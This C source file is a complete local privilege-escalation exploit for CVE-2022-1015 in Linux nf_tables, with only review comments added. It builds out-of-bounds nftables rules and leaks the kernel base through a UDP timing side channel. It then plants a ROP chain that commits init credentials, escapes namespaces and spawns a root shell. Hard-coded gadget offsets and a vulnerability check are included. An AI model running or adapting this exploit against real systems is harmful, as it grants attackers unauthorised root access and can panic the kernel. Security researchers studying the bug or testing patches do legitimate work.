/*
* ----------------------------------------------------------------------------
* "THE BEER-WARE LICENSE" (Revision 42):
* David Bouman (pql) wrote this file. As long as you retain this notice you
* can do whatever you want with this stuff. If we meet some day, and you think
* this stuff is worth it, you can buy me a beer in return. Signed, David.
* ----------------------------------------------------------------------------
*/
#define _GNU_SOURCE 1
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <sys/mman.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <linux/limits.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/expr.h>
#include "helpers.h"
/*
 * Output of calc_vuln_expr_params(): the values that the rule builders below
 * receive as their length and register arguments.
 */
struct vuln_expr_params {
    uint32_t min_len; // lower end of the computed length window; create_infoleak_rule() passes it to rule_add_bit_shift()
    uint32_t max_len; // upper end of the computed length window; used as the length argument of rule_add_payload() in install_rop_chain_rule() and main()
    uint32_t value;   // candidate + 4; used as the register argument of rule_add_payload() (see the register comment in create_base_chain_rule())
};
/*
 * Create the table and its IPv4 base chain, terminating the process on either
 * failure.
 *
 * nl              open netfilter netlink socket
 * table_name      name of the AF_INET table to create
 * base_chain_name name of the base chain, hooked at NF_INET_LOCAL_OUT, prio 10
 * seq             netlink sequence counter handed to the helpers
 */
void setup_nftables(struct mnl_socket* nl, char* table_name, char* base_chain_name, int* seq)
{
    int rc = create_table(nl, table_name, AF_INET, seq, NULL);
    if (rc == -1) {
        perror("Failed creating table");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created nft %s\n", table_name);

    struct unft_base_chain_param hook_params;
    hook_params.hook_num = NF_INET_LOCAL_OUT;
    hook_params.prio = 10;

    rc = create_chain(nl, table_name, base_chain_name, NFPROTO_IPV4, &hook_params, seq, NULL);
    if (rc != 0) {
        perror("Failed creating base chain");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created base ipv4 chain %s\n", base_chain_name);
}
/*
 * Walk downward from a shift-dependent starting value looking for a candidate
 * whose low byte equals `desired` and whose 4x multiple (mod 2^32) plus
 * max_len still reaches 2^32.
 *
 * result   filled on success (see struct vuln_expr_params)
 * desired  required low byte of the candidate
 * min_len  lower clamp applied to result->min_len
 * max_len  upper clamp applied to result->max_len
 * shift    selects the starting candidate, (1 << (32 - shift)) - 1
 *
 * Returns 0 when a candidate was found, -1 as soon as computed + max_len
 * drops below 2^32 (the loop gives up at that point rather than continuing).
 */
static int calc_vuln_expr_params_div(struct vuln_expr_params* result, uint8_t desired, uint32_t min_len, uint32_t max_len, int shift)
{
    uint64_t base_ = (uint64_t)(1) << (32 - shift);
    uint32_t base = (uint32_t)(base_ - 1); // narrowed to 32 bits
    if (base == 0xffffffff) {
        base = 0xfffffffb; // max actual value
    }
    for (;;) {
        // base is uint32_t, so the multiplication already wraps at 32 bits; the mask changes nothing
        uint64_t computed = (base * 4) & 0xffffffff;
        uint64_t max_value = computed + (uint64_t)(max_len);
        if (max_value < ((uint64_t)(1) << 32)) {
            break; // falls through to the -1 return
        }
        if ( (base & 0xff) != desired) {
            base--;
            continue;
        }
        // distance from computed up to 2^32, narrowed to 32 bits, then an 0x50-byte window above it
        uint32_t len_at_least = ((uint64_t)1 << 32) - computed;
        uint32_t len_at_most = len_at_least + 0x50;
        // clamp the window into [min_len, max_len]
        // NOTE(review): nothing verifies that the clamped window is still non-empty (min_len <= max_len)
        if (min_len > len_at_least) {
            len_at_least = min_len;
        }
        if (max_len < len_at_most) {
            len_at_most = max_len;
        }
        result->max_len = len_at_most;
        result->min_len = len_at_least;
        result->value = base + 4;
        return 0;
    }
    return -1;
}
/*
 * Try calc_vuln_expr_params_div() with shift 0, 1 and 2 in turn and keep the
 * first parameter set it yields.
 *
 * Returns 0 with *result filled on success, -1 when no shift produced one.
 */
static int calc_vuln_expr_params(struct vuln_expr_params *result, uint8_t desired, uint32_t min_len, uint32_t max_len)
{
    int shift = 0;
    while (shift < 3) {
        if (calc_vuln_expr_params_div(result, desired, min_len, max_len, shift) == 0) {
            return 0;
        }
        ++shift;
    }
    return -1;
}
#define MAGIC 0xdeadbeef0badc0de
/*
 * Add the single rule of the base chain: load the UDP destination port and
 * compare it with 9999, load the first 8 inner-header bytes and compare them
 * with MAGIC, then NFT_GOTO the chain literally named "aux_chain".
 *
 * nl          netfilter netlink socket
 * table_name  table that holds chain_name
 * chain_name  base chain the rule is appended to
 * family      nfproto family for the rule and the batch request
 * handle      forwarded to build_rule() (main() passes NULL)
 * seq         netlink sequence counter
 *
 * Returns the result of send_batch_request(); main() treats non-zero as failure.
 *
 * NOTE(review): the build_rule() result is used without a NULL check, and the
 * port (9999) and chain name ("aux_chain") are hard-coded here while main()
 * carries them as SERVER_PORT and aux_chain_name; they must stay in sync.
 */
int create_base_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    // we start by adding a rule to fetch the destination port
    // UDP header destination port starts at offset +2 and is 2 bytes long
    // we store the result in register 8
    rule_add_payload(r, NFT_PAYLOAD_TRANSPORT_HEADER, offsetof(struct udphdr, dest), sizeof(uint16_t), 8);
    // if the destination port does not match, the rule will accept the packet. This will save us a lot of noise,
    // including noise generated by packets sent by our server socket.
    // the server sockets actually have a different stack layout than the client sockets in do_chain, so this is essential.
    uint16_t dest_port = htons(9999);
    rule_add_cmp(r, NFT_CMP_EQ, 8, &dest_port, sizeof dest_port);
    // then, we fetch the first 8 bytes of the inner header.
    // these need to match our magic value, or else the rule will accept the packet.
    // we do this as a failsafe that guarantees we only process packets we
    // actually want to process.
    rule_add_payload(r, NFT_PAYLOAD_INNER_HEADER, 0, 8, 8);
    uint64_t magic = MAGIC;
    rule_add_cmp(r, NFT_CMP_EQ, 8, &magic, sizeof magic);
    // If the packet passed these checks, we jump to the auxiliary chain
    rule_add_immediate_verdict(r, NFT_GOTO, "aux_chain");
    // Commit rule to the kernel
    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}
/*
 * Append the probe expressions to a caller-built rule and submit it: a right
 * shift by pos*8 bits using the computed parameters, a NFT_CMP_GT against the
 * single byte `cmp` in register 0x15, and an NF_DROP verdict.
 *
 * nl          netfilter netlink socket
 * r           rule from build_rule(); do_leak_byte() also sets its handle so
 *             that NLM_F_REPLACE in extraflags swaps the existing rule
 * cmp         byte the loaded value is compared against
 * pos         byte position selected by the shift
 * family      nfproto family for the batch request
 * seq         netlink sequence counter
 * extraflags  OR-ed into NLM_F_CREATE for the request
 *
 * Returns -1 when calc_vuln_expr_params() finds nothing, otherwise the result
 * of send_batch_request().
 *
 * NOTE(review): the parameters are recomputed on every call although the
 * inputs (0xff, 0x40, 0x40) are constant, and on the early -1 return `r` is
 * neither released here nor by the caller.
 */
int create_infoleak_rule(
    struct mnl_socket* nl, struct nftnl_rule* r, uint8_t cmp, uint8_t pos, uint16_t family, int* seq, int extraflags)
{
    struct vuln_expr_params vuln_params;
    // index 0xff translates to +0x3fc, and there's a kernel address that we can grab.
    if (calc_vuln_expr_params(&vuln_params, 0xff, 0x40, 0x40)) {
        puts("Could not find correct params to trigger OOB read.");
        return -1;
    }
    // we shift by pos*8 so that the first byte of the register will be the one at pos `pos`.
    uint32_t shift_amt = (pos * 8);
    rule_add_bit_shift(r, NFT_BITWISE_RSHIFT, vuln_params.min_len, vuln_params.value, 1, &shift_amt, sizeof shift_amt);
    // we compare it to the constant - we can binary search
    // if the compared value is greater than our supplied value,
    // we accept the packet. Else, we drop it.
    rule_add_cmp(r, NFT_CMP_GT, 0x15, &cmp, 1);
    rule_add_immediate_verdict(r, NF_DROP, NULL);
    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE | extraflags, family, (void**)&r, seq,
        NULL
    );
}
#define INFOLEAK_RULE_HANDLE 4
/*
 * Binary-search one byte over [0, 255]. Each step replaces the rule with
 * handle INFOLEAK_RULE_HANDLE through create_infoleak_rule(), sends a
 * MAGIC-tagged datagram to addr and interprets a reply from the listener as
 * "value <= mid" and a recvfrom() error (timeout) as "value > mid".
 *
 * nl              netfilter netlink socket
 * client_sock     bound UDP socket used to send the probe and wait for the reply
 * addr            listener address (SERVER_HOST:SERVER_PORT in main())
 * table_name      table that holds aux_chain_name
 * aux_chain_name  chain whose rule is replaced on every step
 * pos             byte position forwarded to create_infoleak_rule()
 * seq             netlink sequence counter
 *
 * Returns the byte the search converged on. Exits the process on a netlink
 * failure, on a zero-length receive, or on a reply other than "MSG_OK".
 *
 * NOTE(review): sendto()'s return value is ignored; `result` is 16 bytes and
 * recvfrom() may fill all 16, leaving no terminator for strcmp(); every
 * recvfrom() error, not only a timeout, is counted as "greater than mid".
 */
uint8_t do_leak_byte(struct mnl_socket* nl, int client_sock, struct sockaddr_in* addr, char* table_name, char* aux_chain_name, uint8_t pos, int* seq)
{
    uint8_t low = 0;
    uint8_t high = 255;
    uint8_t mid;
    char msg[16] = {};
    char result[16] = {};
    *(uint64_t*)msg = MAGIC; // type-punned store; create_base_chain_rule() compares these 8 bytes against MAGIC
    for(;;) {
        mid = (high + low) / 2;
        printf("bounds (inclusive): [0x%.2hhx, 0x%.2hhx]\n", low, high);
        if (low == high) {
            return mid;
        }
        // Create a rule that replaces the rule with handle INFOLEAK_RULE_HANDLE
        struct nftnl_rule* r = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
        nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, INFOLEAK_RULE_HANDLE);
        // The rule is going to compare the selected byte against `mid` (see create_infoleak_rule)
        if (create_infoleak_rule(nl, r, mid, pos, NFPROTO_IPV4, seq, NLM_F_REPLACE)) {
            perror("Could not replace infoleak rule");
            exit(EXIT_FAILURE);
        }
        sendto(client_sock, msg, sizeof msg, 0, (struct sockaddr*)addr, sizeof *addr); // return value not checked
        struct sockaddr_in presumed_server_addr;
        socklen_t presumed_server_addr_len = sizeof presumed_server_addr;
        int nrecv = recvfrom(client_sock, result, sizeof result, 0, (struct sockaddr*)&presumed_server_addr, &presumed_server_addr_len);
        if (!nrecv) {
            puts("[-] Remote socket closed...");
            exit(EXIT_FAILURE);
        } else if (nrecv < 0) {
            // In case of timeout, value is greater than `mid`
            low = mid + 1;
        } else {
            // result is only NUL-terminated if fewer than 16 bytes arrived
            if (strcmp(result, "MSG_OK")) {
                puts("[-] Something went wrong...");
                exit(EXIT_FAILURE);
            }
            memset(result, 0, sizeof result);
            // But if we get a response, the packet arrived at the server and therefore the value is lower than or equal to mid
            high = mid;
        }
    }
}
/*
 * Recover bytes 1..3 of a 32-bit value with do_leak_byte(), using a UDP
 * client socket bound to CLIENT_HOST:CLIENT_PORT with a receive timeout.
 *
 * nl              netfilter netlink socket
 * addr            listener address passed on to do_leak_byte()
 * table_name      table that holds aux_chain_name
 * aux_chain_name  chain whose rule do_leak_byte() replaces
 * seq             netlink sequence counter
 *
 * Returns the four result bytes reinterpreted as one uint32_t. Byte 0 is never
 * probed and stays 0; main() adds the low byte of LEAK_BASE_OFFSET instead.
 * On bind() failure `return -1` becomes 0xffffffff because of the uint32_t
 * return type.
 *
 * NOTE(review): socket() and setsockopt() results are unchecked, and
 * client_sock is not closed on the bind() failure path.
 */
uint32_t do_leak(struct mnl_socket* nl, struct sockaddr_in* addr, char* table_name, char* aux_chain_name, int* seq)
{
#define CLIENT_HOST "127.0.0.1"
#define CLIENT_PORT 8888
    int client_sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    struct sockaddr_in client_addr; // sin_zero is left indeterminate
    inet_aton(CLIENT_HOST, &client_addr.sin_addr);
    client_addr.sin_port = htons(CLIENT_PORT);
    client_addr.sin_family = AF_INET;
    if (bind(client_sock, (struct sockaddr*)&client_addr, sizeof client_addr) < 0) {
        perror("client bind");
        return -1;
    }
    // 100ms receive timeout
    // can probably be lower
    struct timespec t = {.tv_sec = 0, .tv_nsec = 1000 * 200};
    setsockopt(client_sock, SOL_SOCKET, SO_RCVTIMEO, &t, sizeof t);
    uint8_t results[4] = {};
    // results[0] is intentionally skipped; see the LEAK_BASE_OFFSET comment in main()
    for(int i = 1; i < 4; ++i) {
        results[i] = do_leak_byte(nl, client_sock, addr, table_name, aux_chain_name, i, seq);
        printf("[+] Leaked byte %i: %.2hhx\n", i, results[i]);
    }
    close(client_sock);
    return *(uint32_t*)results; // type-punned read; byte order is the host's
}
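/*
 * Debug UDP listener: receive datagrams on fd forever and hexdump each one
 * together with its source address. Not referenced by main(), which uses
 * leak_handler() instead.
 *
 * fd  bound UDP socket
 *
 * Returns -1 (after printing the errno) when recvfrom() fails or returns 0;
 * otherwise the loop never ends.
 */
int simple_handler(int fd)
{
    char buf[4096] = {0};
    struct sockaddr_in client_addr = {0};
    for (;;) {
        // recvfrom() rewrites the address length, so start from the full size each time
        socklen_t client_addr_size = sizeof client_addr;
        int len = recvfrom(fd, buf, sizeof buf - 1, 0, (struct sockaddr*)&client_addr, &client_addr_size);
        if (len <= 0) {
            printf("listener receive failed..\n");
            perror("");
            return -1;
        }
        printf("Received message from [%s:%d] (udp) (0x%x bytes):\n", inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port), len);
        hexdump(buf, len, 8);
    }
    // not reached: the loop only exits through the return above
    close(fd);
    return 0;
}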
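/*
 * Listener started by main() for the leak phase: answer every datagram
 * received on fd with "MSG_OK" (terminator included) sent back to its sender.
 *
 * fd  bound UDP socket (see setup_listener() in main())
 *
 * Returns -1 (after printing the errno) when recvfrom() fails or returns 0;
 * otherwise the loop never ends.
 */
int leak_handler(int fd)
{
    char buf[4096] = {0};
    static const char send_back[] = "MSG_OK";
    struct sockaddr_in client_addr = {0};
    for (;;) {
        // recvfrom() rewrites the address length, so start from the full size each time
        socklen_t client_addr_size = sizeof client_addr;
        int len = recvfrom(fd, buf, sizeof buf - 1, 0, (struct sockaddr*)&client_addr, &client_addr_size);
        if (len <= 0) {
            printf("listener receive failed..\n");
            perror("");
            return -1;
        }
        // best effort: a failed reply is reported but does not stop the listener
        if (sendto(fd, send_back, sizeof send_back, 0, (struct sockaddr*)&client_addr, client_addr_size) < 0) {
            perror("listener sendto");
        }
    }
    // not reached: the loop only exits through the return above
    close(fd);
    return 0;
}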
/* Assigned in main() from mmap() + 0x3ff0; never read anywhere in this file. */
void* new_stack;
/* This is where we return after our rop chain */
/* Declared but neither defined nor referenced in this file; presumably provided
 * by another translation unit. A file-scope name starting with an underscore
 * is reserved for the implementation in C. */
extern void _after_rop();
/*
 * Called by main() once trigger_rop() has returned: runs `id` and then `sh`
 * through system(); neither return value is checked.
 */
void after_rop()
{
    system("id");
    system("sh");
}
/*
 * Add a single NFT_PAYLOAD_INNER_HEADER rule to `chain` in the hard-coded
 * table "exploit_table", using the parameters from calc_vuln_expr_params()
 * with the same (0xca, 0x00, 0xff) arguments main() uses for its probe rule.
 *
 * nl           netfilter netlink socket
 * kernel_base  unused in this function
 * chain        chain that receives the rule
 * seq          netlink sequence counter
 *
 * Returns v.max_len (a uint32_t narrowed to int) on success, which main()
 * then passes to trigger_rop() as rop_length; returns -1 when no parameters
 * were found, or the non-zero send_batch_request() result on a netlink error.
 *
 * NOTE(review): the return value mixes a length with error codes, so callers
 * can only distinguish them by sign (main() checks `err < 0`); the
 * build_rule() result is used without a NULL check.
 */
static int install_rop_chain_rule(struct mnl_socket* nl, uint64_t kernel_base, char* chain, int* seq)
{
    // return address is at regs.data[0xca]
    struct vuln_expr_params v;
    if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
        puts("[-] Cannot find suitable parameters for planting ROP chain.");
        return -1;
    }
    struct nftnl_rule* r = build_rule("exploit_table", chain, NFPROTO_IPV4, NULL);
    //nftnl_rule_set_u64(r, NFTNL_RULE_HANDLE, INFOLEAK_RULE_HANDLE);
    rule_add_payload(r, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);
    int err = send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, NFPROTO_IPV4, (void**)&r, seq,
        NULL
    );
    if (err) {
        perror("send_batch_request");
        return err;
    }
    return v.max_len;
}
/*
 * Build the payload datagram from kernel_base plus the offsets defined below
 * and send it to magic_addr over a freshly created UDP socket.
 *
 * nl           unused in this function
 * kernel_base  base address added to every offset in the chain
 * magic_addr   destination of the datagram
 * rop_length   byte budget for the chain; the _rop() macro exits the process
 *              when the next slot would exceed it
 *
 * The datagram is rop_length + 8 bytes: one zero quadword followed by the chain.
 *
 * NOTE(review): the calloc() and socket() results are not checked, sendto()'s
 * return value is ignored, and the socket `s` is never closed.
 */
void trigger_rop(struct mnl_socket* nl, uint64_t kernel_base, struct sockaddr_in* magic_addr, int rop_length)
{
// Structures in .data
#define INIT_NSPROXY_OFF 0x1867360
#define INIT_PID_NS_OFF 0x1866fe0
#define INIT_CRED_OFF 0x18675a0
// Routines in .text
#define SWITCH_TASK_NAMESPACES_OFF 0xd1040
#define COMMIT_CREDS_OFF 0xd2430
#define FIND_TASK_BY_VPID_OFF 0x0c8c80
#define BPF_GET_CURRENT_TASK_OFF 0x1ebde0
#define __DO_SOFTIRQ_OFF 0x1000000
// Gadgets
#define MOV_RDI_RAX_OFF 0xc032fb // constraint: rcx==0
#define POP_RDI_OFF 0x92610
#define POP_RSI_OFF 0x676d2
#define POP_RCX_OFF 0x139a3
#define POP_RBP_OFF 0x6ffa8d
#define XOR_ECX_ECX_OFF 0x7110bf
#define MOV_R13_RCX_POP_RBP_OFF 0xaf089b
#define POP_R11_R12_RBP_OFF 0x054645
#define CLI_OFF 0x4df88b
#define STI_OFF 0xc061c0
#define MOV_RCX_RAX_OFF 0x2faad4
#define SWAPGS_SYSRETQ_OFF 0xe000fb
// Misc.
#define OLD_TASK_FLAGS_OFF 0x1a554a // 0x40010000
    uint64_t *packet = calloc(1, rop_length + 8); // result not checked
    packet[0] = 0;
    uint64_t* rop = &packet[1];
    // 0xffffffff819d5cda <__netif_receive_skb_one_core+122> ret
    int i = 0;
    // appends one quadword; exits the process if rop_length would be exceeded
#define _rop(x) do { if ((i+1)*8 > rop_length) { puts("ROP TOO LONG"); exit(EXIT_FAILURE);} rop[i++] = (x); } while (0)
    // clear interrupts
    _rop(kernel_base + CLI_OFF);
    // make rbp-0x58 point to 0x40010000
    _rop(kernel_base + POP_RBP_OFF);
    _rop(kernel_base + OLD_TASK_FLAGS_OFF + 0x58);
    /* Cleanly exit softirq and return to syscall context */
    _rop(kernel_base + __DO_SOFTIRQ_OFF + 418);
    // stack frame was 0x60 bytes
    for(int j = 0; j < 12; ++j) _rop(0);
    /* We're already on 128 bytes here */
    // switch_task_namespaces(current, &init_nsproxy)
    _rop(kernel_base + BPF_GET_CURRENT_TASK_OFF);
    _rop(kernel_base + MOV_RDI_RAX_OFF); // rcx happens to already be 0
    _rop(kernel_base + POP_RSI_OFF);
    _rop(kernel_base + INIT_NSPROXY_OFF);
    _rop(kernel_base + SWITCH_TASK_NAMESPACES_OFF);
    // commit_cred(&init_cred)
    _rop(kernel_base + POP_RDI_OFF);
    _rop(kernel_base + INIT_CRED_OFF);
    _rop(kernel_base + COMMIT_CREDS_OFF);
    // pass control to system call stack
    // this is offset +0xc0 from our rop chain
    // target is at +0x168
    _rop(kernel_base + 0x28b2e4); // add rsp, 0x90; pop rbx; pop rbp; ret
    int s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); // result not checked, never closed
    puts("Triggering payload..");
    sendto(s, packet, rop_length + 8, 0, (struct sockaddr*)magic_addr, sizeof *magic_addr);
}
/*
 * Entry point.
 *
 * Without an argument the program re-executes itself through
 * /usr/bin/unshare -Urn with the marker argument "EXPLOIT" and exits if
 * execve() returns. With the marker present it brings lo up, opens a
 * netfilter netlink socket, creates the table, chains and rules through the
 * helpers above, reports whether the kernel accepted the probe rule, and
 * continues to the leak and payload steps only after 'y' is read from stdin.
 *
 * NOTE(review): the results of mnl_socket_open(), inet_aton(), read(0, a, 1)
 * and mmap() are not checked; `server` is only partially initialised
 * (sin_zero stays indeterminate); `seq` is time(NULL) narrowed to int; after
 * install_rop_chain_rule() succeeds `err` holds a length rather than an error
 * code; the `};` after the last if-block is an empty statement.
 */
int main(int argc, char** argv, char** envp)
{
    if (argc < 2) {
        puts("[+] Dropping into network namespace");
        // We're too lazy to perform uid mapping and such.
        char* new_argv[] = {
            "/usr/bin/unshare",
            "-Urn",
            argv[0],
            "EXPLOIT",
            NULL
        };
        execve(new_argv[0], new_argv, envp);
        // only reached when execve() failed
        puts("Couldn't start unshare wrapper..");
        puts("Recompile the exploit with an appropriate unshare path.");
        exit(EXIT_FAILURE);
    }
    if (strcmp("EXPLOIT", argv[1])) {
        puts("[-] Something went wrong...");
        exit(EXIT_FAILURE);
    }
    // I'm too lazy to talk to NETLINK_ROUTE..
    // Deal with it!
    system("ip link set dev lo up");
    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER); // result not checked
    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("[-] mnl_socket_bind");
        puts("[-] Are you sure you have CAP_NET_ADMIN?..");
        exit(EXIT_FAILURE);
    }
    int seq = time(NULL); // time_t narrowed to int
    int err;
    char *table_name = "exploit_table",
        *base_chain_name = "base_chain",
        *aux_chain_name = "aux_chain";
    setup_nftables(nl, table_name, base_chain_name, &seq);
    if (create_chain(nl, table_name, aux_chain_name, NFPROTO_IPV4, NULL, &seq, NULL)) {
        perror("Failed creating auxiliary chain");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created auxiliary chain %s\n", aux_chain_name);
    if (create_base_chain_rule(nl, table_name, base_chain_name, NFPROTO_IPV4, NULL, &seq)) {
        perror("Failed creating base chain rule");
        exit(EXIT_FAILURE);
    }
    puts("[+] Created base chain rule");
    // we need to make a rule first in order to replace it
    // in our leaky rule creation. it's a bit of a hack but it works
    // We can also use it to determine whether the system is vulnerable
    // before actually exploiting.
    struct vuln_expr_params v;
    // offset 0xca and len 0xff is OOB
    if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) {
        puts("[-] Something went horribly wrong...");
        exit(EXIT_FAILURE);
    }
    struct nftnl_rule* aux_rule = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL);
    rule_add_payload(aux_rule, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value);
    err = send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, NFPROTO_IPV4, (void**)&aux_rule, &seq,
        NULL
    );
    // a rejected rule is taken as "patched"; any other netlink error is reported the same way
    if (err) {
        puts(CLR_RED "[+] TARGET IS NOT VULNERABLE to CVE-2022-1015!" CLR_RESET);
        exit(EXIT_FAILURE);
    }
    puts("[+] Succesfully created rule with OOB nft_payload!");
    puts(CLR_GRN "[+] TARGET IS VULNERABLE to CVE-2022-1015!" CLR_RESET);
    puts("[+] Type 'y' to try exploiting the target.");
    puts(CLR_RED "!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!" CLR_RESET);
    char a[4] = {};
    read(0, a, 1); // return value not checked; a[0] stays 0 on EOF or error
    if (a[0] != 'y') {
        puts("Bye!");
        exit(EXIT_SUCCESS);
    }
#define SERVER_HOST "127.0.0.1"
#define SERVER_PORT 9999
    int pid = setup_listener(SERVER_HOST, SERVER_PORT, leak_handler);
    struct sockaddr_in server; // sin_zero is left indeterminate
    inet_aton(SERVER_HOST, &server.sin_addr);
    server.sin_port = htons(SERVER_PORT);
    server.sin_family = AF_INET;
#define LEAK_BASE_OFFSET 0x9ac3ec
    uint32_t leak = do_leak(nl, &server, table_name, aux_chain_name, &seq);
    // first byte might fail due to buggy carry implementation with shift_amt = 0
    // so we just set it. The LSB will always remain constant.
    uint64_t kernel_addr = 0xffffffff00000000 + leak + (LEAK_BASE_OFFSET & 0xff);
    uint64_t kernel_base = kernel_addr - LEAK_BASE_OFFSET;
    // If the kernel base isn't aligned we should probably not continue.
    if((kernel_base & 0xfffff) != 0) {
        puts("[-] Leak failed.");
        puts("[-] Try changing offsets / lengths / chain types.");
        puts("[-] If all leaked bytes were ff, this is probably because of corrupted loopback state.. RIP");
        exit(EXIT_FAILURE);
    }
    printf("[+] Kernel base @ 0x%.16lx\n", kernel_base);
    stop_listener(pid);
    struct unft_base_chain_param bp;
    bp.hook_num = NF_INET_LOCAL_IN;
    bp.prio = 10;
    if (create_chain(nl, table_name, "base_chain_2", NFPROTO_IPV4, &bp, &seq, NULL)) {
        perror("Failed adding second base chain");
        exit(EXIT_FAILURE);
    }
    // on success err is the rule's payload length, reused below as rop_length
    err = install_rop_chain_rule(nl, kernel_base, "base_chain_2", &seq);
    if (err < 0) {
        perror("[-] Could not install ROP chain");
        exit(EXIT_FAILURE);
    };
    new_stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0) + 0x3ff0; // mmap() result not checked; void* arithmetic is a GNU extension
    trigger_rop(nl, kernel_base, &server, err);
    after_rop();
}